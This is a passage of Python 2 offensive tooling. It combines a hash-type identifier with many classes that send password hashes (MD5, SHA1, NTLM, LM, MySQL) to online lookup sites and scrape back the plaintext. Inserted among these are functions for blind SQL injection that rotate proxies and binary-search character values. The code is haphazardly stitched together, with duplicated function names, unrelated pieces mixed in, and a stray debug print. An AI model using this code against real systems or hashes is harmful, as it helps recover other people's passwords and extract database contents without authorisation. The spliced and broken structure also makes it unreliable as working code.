2788.         jerar.append("106340")
2789. def md5saltmd5passsalt():
2790.     hs='de0237dc03a8efdf6552fbe7788b2fdd'
2791.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2792.         jerar.append("106360")
2793. def md5saltmd5passsalt():
2794.     hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f'
2795.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2796.         jerar.append("106380")
2797. def md5saltmd5saltpass():
2798.     hs='d8f3b3f004d387086aae24326b575b23'
2799.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2800.         jerar.append("106400")
2801. def md5saltmd5md5passsalt():
2802.     hs='81f181454e23319779b03d74d062b1a2'
2803.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2804.         jerar.append("106420")
2805. def md5username0pass():
2806.     hs='e44a60f8f2106492ae16581c91edb3ba'
2807.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2808.         jerar.append("106440")
2809. def md5usernameLFpass():
2810.     hs='654741780db415732eaee12b1b909119'
2811.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2812.         jerar.append("106460")
2813. def md5usernamemd5passsalt():
2814.     hs='954ac5505fd1843bbb97d1b2cda0b98f'
2815.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2816.         jerar.append("106480")
2817.  
2818.  
2819. class MYINFOSEC:
2820.    
2821.     name =      "myinfosec"
2822.     url =       "http://md5.myinfosec.net"
2823.     supported_algorithm = [MD5]
2824.    
2825.     def isSupported (self, alg):
2826.        
2827.        
2828.        
2829.         if alg in self.supported_algorithm:
2830.             return True
2831.         else:
2832.             return False
2833.  
2834.  
2835.  
2836.     def crack (self, hashvalue, alg):
2837.        
2838.        
2839.        
2840.        
2841.        
2842.         if not self.isSupported (alg):
2843.             return None
2844.        
2845.        
2846.         url = "http://md5.myinfosec.net/md5.php"
2847.        
2848.        
2849.         params = { "md5hash" : hashvalue }
2850.        
2851.        
2852.         response = do_HTTP_request ( url, params )
2853.        
2854.        
2855.         html = None
2856.         if response:
2857.             html = response.read()
2858.         else:
2859.             return None
2860.        
2861.         match = search (r'<center></center>[^<]*<font color=green>[^<]*</font><br></center>', html)
2862.        
2863.         if match:
2864.             return match.group().split('>')[3][:-6]
2865.         else:
2866.             return None
2867.  
2868.  
2869.  
2870. class MD5_NET:
2871.    
2872.     name =      "md5.net"
2873.     url =       "http://md5.net"
2874.     supported_algorithm = [MD5]
2875.    
2876.     def isSupported (self, alg):
2877.        
2878.        
2879.        
2880.         if alg in self.supported_algorithm:
2881.             return True
2882.         else:
2883.             return False
2884.  
2885.  
2886.  
2887.     def crack (self, hashvalue, alg):
2888.        
2889.        
2890.        
2891.        
2892.        
2893.         if not self.isSupported (alg):
2894.             return None
2895.        
2896.        
2897.         url = "http://www.md5.net/cracker.php"
2898.        
2899.        
2900.         params = { "hash" : hashvalue }
2901.        
2902.        
2903.         response = do_HTTP_request ( url, params )
2904.        
2905.        
2906.         html = None
2907.         if response:
2908.             html = response.read()
2909.         else:
2910.             return None
2911.        
2912.         match = search (r'<input type="text" id="hash" size="32" value="[^"]*"/>', html)
2913.        
2914.         if match:
2915.             return match.group().split('"')[7]
2916.         else:
2917.             return None
2918.  
2919.  
2920.  
2921.  
2922. class NOISETTE:
2923.    
2924.     name =      "noisette.ch"
2925.     url =       "http://md5.noisette.ch"
2926.     supported_algorithm = [MD5]
2927.    
2928.     def isSupported (self, alg):
2929.        
2930.        
2931.        
2932.         if alg in self.supported_algorithm:
2933.             return True
2934.         else:
2935.             return False
2936.  
2937.  
2938.  
2939.     def crack (self, hashvalue, alg):
2940.        
2941.        
2942.        
2943.        
2944.        
2945.         if not self.isSupported (alg):
2946.             return None
2947.        
2948.        
2949.         url = "http://md5.noisette.ch/index.php"
2950.        
2951.        
2952.         params = { "hash" : hashvalue }
2953.        
2954.        
2955.         response = do_HTTP_request ( url, params )
2956.        
2957.        
2958.         html = None
2959.         if response:
2960.             html = response.read()
2961.         else:
2962.             return None
2963.        
2964.         match = search (r'<p>String to hash : <input name="text" value="[^"]+"/>', html)
2965.        
2966.         if match:
2967.             return match.group().split('"')[3]
2968.         else:
2969.             return None
2970.  
2971.  
2972.  
2973.  
2974. class MD5HOOD:
2975.    
2976.     name =      "md5hood"
2977.     url =       "http://md5hood.com"
2978.     supported_algorithm = [MD5]
2979.    
2980.     def isSupported (self, alg):
2981.        
2982.        
2983.        
2984.         if alg in self.supported_algorithm:
2985.             return True
2986.         else:
2987.             return False
2988.  
2989.  
2990.  
2991.     def crack (self, hashvalue, alg):
2992.        
2993.        
2994.        
2995.        
2996.        
2997.         if not self.isSupported (alg):
2998.             return None
2999.        
3000.        
3001.         url = "http://md5hood.com/index.php/cracker/crack"
3002.        
3003.        
3004.         params = { "md5" : hashvalue,
3005.                "submit" : "Go" }
3006.        
3007.        
3008.         response = do_HTTP_request ( url, params )
3009.        
3010.        
3011.         html = None
3012.         if response:
3013.             html = response.read()
3014.         else:
3015.             return None
3016.        
3017.         match = search (r'<div class="result_true">[^<]*</div>', html)
3018.        
3019.         if match:
3020.             return match.group().split('>')[1][:-5]
3021.         else:
3022.             return None
3023.  
3024.  
3025.  
3026. class STRINGFUNCTION:
3027.    
3028.     name =      "stringfunction"
3029.     url =       "http://www.stringfunction.com"
3030.     supported_algorithm = [MD5, SHA1]
3031.    
3032.     def isSupported (self, alg):
3033.        
3034.        
3035.        
3036.         if alg in self.supported_algorithm:
3037.             return True
3038.         else:
3039.             return False
3040.  
3041.  
3042.  
3043.     def crack (self, hashvalue, alg):
3044.        
3045.        
3046.        
3047.        
3048.        
3049.         if not self.isSupported (alg):
3050.             return None
3051.        
3052.        
3053.         url = ""
3054.         if alg == MD5:
3055.             url = "http://www.stringfunction.com/md5-decrypter.html"
3056.         else:
3057.             url = "http://www.stringfunction.com/sha1-decrypter.html"
3058.        
3059.        
3060.         params = { "string" : hashvalue,
3061.                "submit" : "Decrypt",
3062.                "result" : "" }
3063.        
3064.        
3065.         response = do_HTTP_request ( url, params )
3066.        
3067.        
3068.         html = None
3069.         if response:
3070.             html = response.read()
3071.         else:
3072.             return None
3073.        
3074.         match = search (r'<textarea class="textarea-input-tool-b" rows="10" cols="50" name="result"[^>]*>[^<]+</textarea>', html)
3075.        
3076.         if match:
3077.             return match.group().split('>')[1][:-10]
3078.         else:
3079.             return None
3080.  
3081.  
3082.  
3083.  
3084.  
3085. class XANADREL:
3086.    
3087.     name =      "99k.org"
3088.     url =       "http://xanadrel.99k.org"
3089.     supported_algorithm = [MD4, MD5]
3090.    
3091.     def isSupported (self, alg):
3092.        
3093.        
3094.        
3095.         if alg in self.supported_algorithm:
3096.             return True
3097.         else:
3098.             return False
3099.  
3100.  
3101.  
3102.     def crack (self, hashvalue, alg):
3103.        
3104.        
3105.        
3106.        
3107.        
3108.         if not self.isSupported (alg):
3109.             return None
3110.        
3111.        
3112.         url = "http://xanadrel.99k.org/hashes/index.php?k=search"
3113.        
3114.        
3115.         params = { "hash" : hashvalue,
3116.                "search" : "ok" }
3117.        
3118.        
3119.         response = do_HTTP_request ( url, params )
3120.        
3121.        
3122.         html = None
3123.         if response:
3124.             html = response.read()
3125.         else:
3126.             return None
3127.        
3128.         match = search (r'<p>Hash : [^<]*<br />Type : [^<]*<br />Plain : "[^"]*"<br />', html)
3129.        
3130.         if match:
3131.             return match.group().split('"')[1]
3132.         else:
3133.             return None
3134.  
3135.  
3136. def Tiger128():
3137.     hs='c086184486ec6388ff81ec9f23528727'
3138.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3139.         jerar.append("106220")
3140. def Tiger128HMAC():
3141.     hs='c87032009e7c4b2ea27eb6f99723454b'
3142.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3143.         jerar.append("106225")
3144. def md5passsalt():
3145.     hs='5634cc3b922578434d6e9342ff5913f7'
3146.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3147.         jerar.append("106240")
3148. def md5saltmd5pass():
3149.     hs='245c5763b95ba42d4b02d44bbcd916f1'
3150.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3151.         jerar.append("106260")
3152. def md5saltpass():
3153.     hs='22cc5ce1a1ef747cd3fa06106c148dfa'
3154.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3155.         jerar.append("106280")
3156. def md5saltpasssalt():
3157.     hs='469e9cdcaff745460595a7a386c4db0c'
3158.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3159.         jerar.append("106300")
3160.  
3161.  
3162. class SANS:
3163.    
3164.     name =      "sans"
3165.     url =       "http://isc.sans.edu"
3166.     supported_algorithm = [MD5, SHA1]
3167.    
3168.     def isSupported (self, alg):
3169.        
3170.        
3171.        
3172.         if alg in self.supported_algorithm:
3173.             return True
3174.         else:
3175.             return False
3176.  
3177.  
3178.  
3179.     def crack (self, hashvalue, alg):
3180.        
3181.        
3182.        
3183.        
3184.        
3185.         if not self.isSupported (alg):
3186.             return None
3187.        
3188.        
3189.         url = "http://isc.sans.edu/tools/reversehash.html"
3190.        
3191.         headers = { "User-Agent" : USER_AGENTS[randint(0, len(USER_AGENTS))-1] }
3192.        
3193.        
3194.         response = do_HTTP_request ( url, httpheaders=headers )
3195.         html = None
3196.         if response:
3197.             html = response.read()
3198.         else:
3199.             return None
3200.         match = search (r'<input type="hidden" name="token" value="[^"]*" />', html)
3201.         token = ""
3202.         if match:
3203.             token = match.group().split('"')[5]
3204.         else:
3205.             return None
3206.        
3207.         params = { "token" : token,
3208.                "text" : hashvalue,
3209.                "word" : "",
3210.                "submit" : "Submit" }
3211.        
3212.        
3213.         headers["Referer"] = "http://isc.sans.edu/tools/reversehash.html"
3214.        
3215.        
3216.         response = do_HTTP_request ( url, params, headers )
3217.        
3218.        
3219.         html = None
3220.         if response:
3221.             html = response.read()
3222.         else:
3223.             return None
3224.        
3225.         match = search (r'... hash [^\s]* = [^\s]*\s*</p><br />', html)
3226.        
3227.         if match:
3228.             print "hola mundo"
3229.             return match.group().split('=')[1][:-10].strip()
3230.         else:
3231.             return None
3232.  
3233.  
3234.  
3235. class BOKEHMAN:
3236.    
3237.     name =      "bokehman"
3238.     url =       "http://bokehman.com"
3239.     supported_algorithm = [MD4, MD5]
3240.    
3241.     def isSupported (self, alg):
3242.        
3243.        
3244.        
3245.         if alg in self.supported_algorithm:
3246.             return True
3247.         else:
3248.             return False
3249.  
3250.  
3251.  
3252.     def crack (self, hashvalue, alg):
3253.        
3254.        
3255.        
3256.        
3257.        
3258.         if not self.isSupported (alg):
3259.             return None
3260.        
3261.        
3262.         url = "http://bokehman.com/cracker/"
3263.        
3264.        
3265.         response = do_HTTP_request ( url )
3266.         html = None
3267.         if response:
3268.             html = response.read()
3269.         else:
3270.             return None
3271.         match = search (r'<input type="hidden" name="PHPSESSID" id="PHPSESSID" value="[^"]*" />', html)
3272.         phpsessnid = ""
3273.         if match:
3274.             phpsessnid = match.group().split('"')[7]
3275.         else:
3276.             return None
3277.         match = search (r'<input type="hidden" name="key" id="key" value="[^"]*" />', html)
3278.         key = ""
3279.         if match:
3280.             key = match.group().split('"')[7]
3281.         else:
3282.             return None
3283.        
3284.         params = { "md5" : hashvalue,
3285.                "PHPSESSID" : phpsessnid,
3286.                "key" : key,
3287.                "crack" : "Try to crack it" }
3288.        
3289.        
3290.         response = do_HTTP_request ( url, params )
3291.        
3292.        
3293.         html = None
3294.         if response:
3295.             html = response.read()
3296.         else:
3297.             return None
3298.        
3299.         match = search (r'<tr><td>[^<]*</td><td>[^<]*</td><td>[^s]*seconds</td></tr>', html)
3300.        
3301.         if match:
3302.             return match.group().split('td>')[1][:-2]
3303.         else:
3304.             return None
3305.  
3306.  
3307.  
3308. class GOOG_LI:
3309.  
3310.     name =      "goog.li"
3311.     url =       "http://goog.li"
3312.     supported_algorithm = [MD5, MYSQL, SHA1, SHA224, SHA384, SHA256, SHA512, RIPEMD, NTLM, GOST, WHIRLPOOL, LDAP_MD5, LDAP_SHA1]
3313.    
3314.     def isSupported (self, alg):
3315.        
3316.        
3317.        
3318.         if alg in self.supported_algorithm:
3319.             return True
3320.         else:
3321.             return False
3322.  
3323.  
3324.     def crack (self, hashvalue, alg):
3325.        
3326.        
3327.        
3328.        
3329.        
3330.         if not self.isSupported (alg):
3331.             return None
3332.            
3333.         hash2 = None
3334.         if alg in [NTLM] and ':' in hashvalue:
3335.             hash2 = hashvalue.split(':')[1]
3336.         else:
3337.             hash2 = hashvalue
3338.        
3339.        
3340.         if alg == MYSQL and hash2[0] != '*':
3341.             hash2 = '*' + hash2
3342.        
3343.        
3344.         url = "http://goog.li/?q=%s" % (hash2)
3345.        
3346.        
3347.         response = do_HTTP_request ( url )
3348.        
3349.        
3350.         html = None
3351.         if response:
3352.             html = response.read()
3353.         else:
3354.             return None
3355.        
3356.         match = search (r'<br />cleartext[^:]*: [^<]*<br />', html)
3357.        
3358.         if match:
3359.             return match.group().split(':')[1].strip()[:-6]
3360.         else:
3361.             return None
3362.  
3363.  
3364.  
3365. class WHREPORITORY:
3366.  
3367.     name =      "Windows Hashes Repository"
3368.     url =       "http://nediam.com.mx"
3369.     supported_algorithm = [LM, NTLM]
3370.    
3371.     def isSupported (self, alg):
3372.        
3373.        
3374.        
3375.         if alg in self.supported_algorithm:
3376.             return True
3377.         else:
3378.             return False
3379.  
3380.  
3381.     def crack (self, hashvalue, alg):
3382.        
3383.        
3384.        
3385.        
3386.        
3387.         if not self.isSupported (alg):
3388.             return None
3389.            
3390.         hash2 = None
3391.         if ':' in hashvalue:
3392.             if alg == LM:
3393.                 hash2 = hashvalue.split(':')[0]
3394.             else:
3395.                 hash2 = hashvalue.split(':')[1]
3396.         else:
3397.             hash2 = hashvalue
3398.        
3399.        
3400.         url = ""
3401.         params = None
3402.         headers = None
3403.         if alg == LM:
3404.             url = "http://nediam.com.mx/winhashes/search_lm_hash.php"
3405.             params = { "lm" : hash2,
3406.                 "btn_go" : "Search" }
3407.             headers = { "Referer" : "http://nediam.com.mx/winhashes/search_lm_hash.php" }
3408.         else:
3409.             url = "http://nediam.com.mx/winhashes/search_nt_hash.php"
3410.             params = { "nt" : hash2,
3411.                 "btn_go" : "Search" }
3412.             headers = { "Referer" : "http://nediam.com.mx/winhashes/search_nt_hash.php" }
3413.        
3414.        
3415.         response = do_HTTP_request ( url, params, headers )
3416.        
3417.        
3418.         html = None
3419.         if response:
3420.             html = response.read()
3421.         else:
3422.             return None
3423.        
3424.         match = search (r'<tr><td align="right">PASSWORD</td><td>[^<]*</td></tr>', html)
3425.        
3426.         if match:
3427.             return match.group().split(':')[1]
3428.         else:
3429.             return None
3430.  
3431.  
3432.  
3433. def GHash323():
3434.     hs='80000000'
3435.     if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
3436.         jerar.append("103040")
3437. def GHash325():
3438.     hs='85318985'
3439.     if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
3440.         jerar.append("103020")
3441.  
3442. def DESUnix():
3443.     hs='ZiY8YtDKXJwYQ'
3444.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
3445.         jerar.append("104020")
3446.  
3447. def MD5Half():
3448.     hs='ae11fd697ec92c7c'
3449.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3450.         jerar.append("105060")
3451. def MD5Middle():
3452.     hs='7ec92c7c98de3fac'
3453.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3454.         jerar.append("105040")
3455. def MySQL():
3456.     hs='63cea4673fd25f46'
3457.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3458.         jerar.append("105020")
3459.  
3460. def DomainCachedCredentials():
3461.     hs='f42005ec1afe77967cbc83dce1b4d714'
3462.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3463.         jerar.append("106025")
3464. def Haval128():
3465.     hs='d6e3ec49aa0f138a619f27609022df10'
3466.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3467.         jerar.append("106160")
3468. def Haval128HMAC():
3469.     hs='3ce8b0ffd75bc240fc7d967729cd6637'
3470.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3471.         jerar.append("106165")
3472. def MD2():
3473.     hs='08bbef4754d98806c373f2cd7d9a43c4'
3474.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3475.         jerar.append("106060")
3476. def MD2HMAC():
3477.     hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
3478.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3479.         jerar.append("106120")
3480. def MD4():
3481.     hs='a2acde400e61410e79dacbdfc3413151'
3482.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3483.         jerar.append("106040")
3484. def MD4HMAC():
3485.     hs='6be20b66f2211fe937294c1c95d1cd4f'
3486.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3487.         jerar.append("106100")
3488. def MD5():
3489.     hs='ae11fd697ec92c7c98de3fac23aba525'
3490.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3491.         jerar.append("106020")
3492. def MD5HMAC():
3493.     hs='d57e43d2c7e397bf788f66541d6fdef9'
3494.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3495.         jerar.append("106080")
3496. def MD5HMACWordpress():
3497.     hs='3f47886719268dfa83468630948228f6'
3498.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3499.         jerar.append("106140")
3500. def NTLM():
3501.     hs='cc348bace876ea440a28ddaeb9fd3550'
3502.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3503.         jerar.append("106029")
3504. def RAdminv2x():
3505.     hs='baea31c728cbf0cd548476aa687add4b'
3506.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3507.         jerar.append("106027")
3508. def RipeMD128():
3509.     hs='4985351cd74aff0abc5a75a0c8a54115'
3510.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3511.         jerar.append("106180")
3512. def RipeMD128HMAC():
3513.     hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3'
3514.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3515.         jerar.append("106185")
3516. def SNEFRU128():
3517.     hs='4fb58702b617ac4f7ca87ec77b93da8a'
3518.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3519.         jerar.append("106200")
3520. def SNEFRU128HMAC():
3521.     hs='59b2b9dcc7a9a7d089cecf1b83520350'
3522.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3523.         jerar.append("106205")
3524.  
3525.  
3526. def GetThatShit(head_URL):
3527.         source = ""
3528.         global gets;global proxy_num
3529.         head_URL = head_URL.replace("+",arg_eva)
3530.         request_web = urllib2.Request(head_URL)
3531.         request_web.add_header('User-Agent',agent)
3532.         while len(source) < 1:
3533.                 if arg_debug == "on":
3534.                         print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
3535.                 try:
3536.                         gets+=1;proxy_num+=1
3537.                         source = proxy_list[proxy_num % proxy_len].open(request_web).read()
3538.                 except (KeyboardInterrupt, SystemExit):
3539.                         raise
3540.                 except (urllib2.HTTPError):
3541.                         print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
3542.                         print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
3543.                         break
3544.                 except:
3545.                         print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
3546.                         print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
3547.                         raise
3548.         return source
3549.  
3550. def GuessValue(URL):
3551.         lower = lower_bound;upper = upper_bound
3552.         while lower < upper:
3553.                 try:
3554.                         mid = (lower + upper) / 2
3555.                         head_URL = URL + ">"+str(mid)
3556.                         source = GetThatShit(head_URL)
3557.                         match = re.findall(arg_string,source)
3558.                         if len(match) >= 1:
3559.                                 lower = mid + 1
3560.                         else:
3561.                                 upper = mid                    
3562.                 except (KeyboardInterrupt, SystemExit):
3563.                         raise
3564.                 except:
3565.                         pass
3566.  
3567.         if lower > lower_bound and lower < upper_bound:
3568.                 value = lower
3569.         else:
3570.                 head_URL = URL + "="+str(lower)
3571.                 source = GetThatShit(head_URL)
3572.                 match = re.findall(arg_string,source)
3573.                 if len(match) >= 1:
3574.                         value = lower
3575.                 else:
3576.                         value = 63
3577.                         print "Could not find the ascii character! There must be a problem.."
3578.                         print "Check to make sure your using the my script right!"
3579.                         print "READ xprog's blind sql tutorial!\n"
3580.                         sys.exit(1)
3581.         return value
3582.  
3583.  
3584. def CRC16():
3585.     hs='4607'
3586.     if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True:
3587.         jerar.append("101020")
3588. def CRC16CCITT():
3589.     hs='3d08'
3590.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3591.         jerar.append("101040")
3592. def FCS16():
3593.     hs='0e5b'
3594.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3595.         jerar.append("101060")
3596.  
3597. def CRC32():
3598.     hs='b33fd057'
3599.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3600.         jerar.append("102040")
3601. def ADLER32():
3602.     hs='0607cb42'
3603.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3604.         jerar.append("102020")
3605. def CRC32B():
3606.     hs='b764a0d9'
3607.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3608.         jerar.append("102060")
3609. def XOR32():
3610.     hs='0000003f'
3611.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3612.         jerar.append("102080")
3613.  
3614.  
3615.  
3616. def c1(word):
3617.     s = hashlib.sha1()
3618.     s.update(word[:-1])
3619.     s2 = hashlib.sha1()
3620.     s2.update(s.digest())
3621.     return s2.hexdigest()
3622.  
3623. def c2(word):
3624.     s = sha.new()
3625.     s.update(word[:-1])
3626.     s2 = sha.new()
3627.     s2.update(s.digest())
3628.     return s2.hexdigest()
3629.  
3630. def mysql323(clear):
3631.     nr = 1345345333
3632.     add = 7
3633.     nr2 = 0x12345671
3634.     retval = ""
3635.     for c in clear:
3636.         if c == ' ' or c == '\t':
3637.             continue
3638.         tmp = ord(c)
3639.         nr ^= (((nr & 63) + add) * tmp) + (nr << 8)
3640.         nr2 += (nr2 << 8) ^ nr
3641.         add += tmp
3642.     res1 = nr & ((1 << 31) - 1)
3643.     res2 = nr2 & ((1 << 31) - 1)
3644.     return "%08lx%08lx" % (res1, res2)
3645.  
3646.  
3647. CRAKERS = [     SCHWETT,
3648.         NETMD5CRACK,
3649.         MD5_CRACKER,
3650.         BENRAMSEY,
3651.         GROMWEB,
3652.         HASHCRACKING,
3653.         VICTOROV,
3654.         THEKAINE,
3655.         TMTO,
3656.         REDNOIZE,
3657.         MD5_DB,
3658.         MY_ADDR,
3659.         MD5PASS,
3660.         MD5DECRYPTION,
3661.         MD5CRACK,
3662.         MD5ONLINE,
3663.         MD5_DECRYPTER,
3664.         AUTHSECUMD5,
3665.         HASHCRACK,
3666.         OPHCRACK,
3667.         C0LLISION,
3668.         CMD5,
3669.         AUTHSECUCISCO7,
3670.         CACIN,
3671.         IBEAST,
3672.         PASSWORD_DECRYPT,
3673.         BIGTRAPEZE,
3674.         HASHCHECKER,
3675.         MD5HASHCRACKER,
3676.         PASSCRACKING,
3677.         ASKCHECK,
3678.         FOX21,
3679.         NICENAMECREW,
3680.         JOOMLAAA,
3681.         MD5_LOOKUP,
3682.         SHA1_LOOKUP,
3683.         SHA256_LOOKUP,
3684.         RIPEMD160_LOOKUP,
3685.         MD5_COM_CN,
3686.         DIGITALSUN,
3687.         DRASEN,
3688.         MYINFOSEC,
3689.         MD5_NET,
3690.         NOISETTE,
3691.         MD5HOOD,
3692.         STRINGFUNCTION,
3693.         XANADREL,
3694.         SANS,
3695.         BOKEHMAN,
3696.         GOOG_LI,
3697.         WHREPORITORY ]
3698.  
3699. def configureCookieProcessor(cookiefile='/tmp/searchmyhash.cookie'):
3700.    
3701.    
3702.     cookieHandler = LWPCookieJar()
3703.     if cookieHandler is not None:
3704.         if path.isfile (cookiefile):
3705.             cookieHandler.load (cookiefile)
3706.            
3707.         opener = urllib2.build_opener ( urllib2.HTTPCookieProcessor(cookieHandler) )
3708.         urllib2.install_opener (opener)
3709.  
3710.  
3711.  
3712. def do_HTTP_request (url, params={}, httpheaders={}):
3713.    
3714.  
3715.     data = {}
3716.     request = None
3717.    
3718.     if params:
3719.         data = urlencode(params)
3720.  
3721.         request = urllib2.Request ( url, data, headers=httpheaders )
3722.     else:
3723.         request = urllib2.Request ( url, headers=httpheaders )
3724.        
3725.     try:
3726.         response = urllib2.urlopen (request)
3727.     except:
3728.         return ""
3729.    
3730.     return response
3731.  
3732.  
3733.  
3734.  
3735.  
3736.  
3737. def crackHash (algorithm, hashvalue=None, hashfile=None):
3738.    
3739.    
3740.     global CRAKERS
3741.    
3742.     crackedhashes = []
3743.    
3744.     cracked = False
3745.    
3746.     if (not hashvalue and not hashfile) or (hashvalue and hashfile):
3747.         return False
3748.    
3749.     hashestocrack = None
3750.     if hashvalue:
3751.         hashestocrack = [ hashvalue ]
3752.     else:
3753.         try:
3754.             hashestocrack = open (hashfile, "r")
3755.         except:
3756.             print "\nIt is not possible to read input file (%s)\n" % (hashfile)
3757.             return cracked
3758.    
3759.    
3760.    
3761.     for activehash in hashestocrack:
3762.         hashresults = []
3763.        
3764.        
3765.         activehash = activehash.strip()
3766.         if algorithm not in [JUNIPER, LDAP_MD5, LDAP_SHA1]:
3767.             activehash = activehash.lower()
3768.        
3769.        
3770.         print "\nCracking HASH: %s\n" % (activehash) ; file.write("\nCracking HASH: %s\n" % (activehash))
3771.  
3772.        
3773.         begin = randint(0, len(CRAKERS)-1)
3774.        
3775.         for i in range(len(CRAKERS)):
3776.            
3777.            
3778.             cr = CRAKERS[ (i+begin)%len(CRAKERS) ]()
3779.            
3780.            
3781.             if not cr.isSupported ( algorithm ):
3782.                 continue
3783.            
3784.            
3785.             print "Analyzing With %s (%s)..." % (cr.name, cr.url)
3786.            
3787.            
3788.             result = None
3789.             try:
3790.                 result = cr.crack ( activehash, algorithm )
3791.             except:
3792.                 print "\n Session Cancelled \n"
3793.                 if hashfile:
3794.                     try:
3795.                         hashestocrack.close()
3796.                     except:
3797.                         pass
3798.                 return False
3799.            
3800.             cracked = 0
3801.             if result:
3802.                
3803.                 if algorithm in [MD4, MD5, SHA1,  SHA224, SHA384, SHA256, SHA512, RIPEMD]:
3804.                     h = hashlib.new (algorithm)
3805.                     h.update (result)
3806.                    
3807.                     if h.hexdigest() == activehash:
3808.                         hashresults.append (result)
3809.                         cracked = 2
3810.                
3811.                 elif algorithm in [LDAP_MD5, LDAP_SHA1]:
3812.                     alg = algorithm.split('_')[1]
3813.                     ahash =  decodestring ( activehash.split('}')[1] )
3814.                    
3815.                     h = hashlib.new (alg)
3816.                     h.update (result)
3817.                    
3818.                     if h.digest() == ahash:
3819.                         hashresults.append (result)
3820.                         cracked = 2
3821.                
3822.                 elif algorithm == NTLM or (algorithm == LM and ':' in activehash):
3823.                     candidate = hashlib.new('md4', result.split()[-1].encode('utf-16le')).hexdigest()
3824.                    
3825.                     if (':' in activehash and candidate == activehash.split(':')[1]) or (':' not in activehash and candidate == activehash):
3826.                         hashresults.append (result)
3827.                         cracked = 2
3828.                
3829.                 else:
3830.                     hashresults.append (result)
3831.                     cracked = 1
3832.            
3833.             if cracked:
3834.                 print "\n***** HASH CRACKED!! *****\nThe original string is: %s\n" % (result)
3835.                 if cracked == 2:
3836.                     break
3837.             else:
3838.                 print "... Hash Not Found in %s\n" % (cr.name)
3839.        
3840.        
3841.        
3842.         if hashresults:
3843.            
3844.             resultlist = []
3845.             for r in hashresults:
3846.                 if r not in resultlist:
3847.                     resultlist.append (r)
3848.                    
3849.             finalresult = ""
3850.             if len(resultlist) > 1:
3851.                 finalresult = ', '.join (resultlist)
3852.             else:
3853.                 finalresult = resultlist[0]
3854.            
3855.             crackedhashes.append ( (activehash, finalresult) )
3856.    
3857.    
3858.     if hashfile:
3859.         try:
3860.             hashestocrack.close ()
3861.         except:
3862.             pass
3863.        
